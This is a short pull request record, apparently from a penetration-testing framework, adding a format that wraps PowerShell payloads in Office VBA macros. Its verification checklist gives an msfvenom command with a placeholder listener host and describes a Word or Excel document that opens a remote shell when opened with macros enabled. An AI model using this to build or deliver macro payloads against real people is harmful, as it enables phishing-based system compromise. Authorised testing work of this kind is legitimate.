### PR TITLE
Create VBA powershell

### PR DESCRIPTION
**Pull request by Meatballs1**
This creates a VBA macro to execute our powershell :)
## Verification
- [x] Setup a listener
- [x] msfvenom -p PAYLOAD -f vba-psh LHOST=blah
- [x] Paste macro into a word/excel macro and run to get a shell.
- [x] Save file. Run (enabling macros) - should automatically get a shell on open.

### CODE REVIEW

**Comment by wchen-r7** [comment]
Hey how did I miss this?

**Comment by wchen-r7** [comment]
Handy documentation for verification purposes:

https://support.office.com/en-sg/article/Create-or-delete-a-macro-f3eb0fa3-4c18-498a-9235-c66ba8e78149

**Comment by wchen-r7** [comment]
BTW, love this!

**Comment by Meatballs1** [comment]
:)

**Pull request merged**
